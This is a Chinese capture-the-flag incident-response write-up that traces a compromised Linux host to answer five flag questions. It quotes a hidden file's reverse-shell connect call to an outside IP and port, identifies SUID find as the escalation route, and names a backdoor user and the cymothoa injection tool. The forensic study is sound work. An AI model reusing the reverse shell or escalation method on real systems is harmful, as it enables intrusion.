首页 靶场练习 玄机 应急响应 第三章

# 题目 1

黑客隐藏的隐藏的文件 完整路径 md5

root@xuanji:~# echo -n "/tmp/.temp/libprocesshider/1.py" | md5sum
109ccb5768c70638e24fb46ee7957e37  -

flag: flag{109ccb5768c70638e24fb46ee7957e37}

# 题目 2

黑客隐藏的文件反弹 shell 的 ip + 端口 {ip:port}

root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py | grep connect
                sdregs.connect(("114.114.114.121",9999))

flag: flag{114.114.114.121:9999}

# 题目 3

黑客提权所用的命令 完整路径的 md5 flag {md5}

root@xuanji:/var/log# find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
root@xuanji:/var/log# echo -n "/usr/bin/find" | md5sum
7fd5884f493f4aaf96abee286ee04120  -
flag: flag{7fd5884f493f4aaf96abee286ee04120}
# 题目 4
黑客尝试注入恶意代码的工具完整路径 md5
看了一眼 passwd,发现有个 ctf 用户,是后门用户
root@xuanji:/opt# find / -user ctf 2>/dev/null
/home/ctf
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/home/ctf/flag
/opt/.cymothoa-1-beta
/opt/.cymothoa-1-beta/Makefile
/opt/.cymothoa-1-beta/cymothoa.c
/opt/.cymothoa-1-beta/cymothoa.h
/opt/.cymothoa-1-beta/payloads/fork_shellcode.s
/opt/.cymothoa-1-beta/payloads.h
/opt/.cymothoa-1-beta/personalization.h
root@xuanji:/opt# echo -n "/opt/.cymothoa-1-beta/cymothoa" | md5sum
087c267368ece4fcf422ff733b51aed9  -
flag: flag{087c267368ece4fcf422ff733b51aed9}
# 题目 5
使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为 flag 提交 flag
root@xuanji:/opt/.cymothoa-1-beta# ls $(which python3) -al
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4
flag: flag{/usr/bin/python3.4}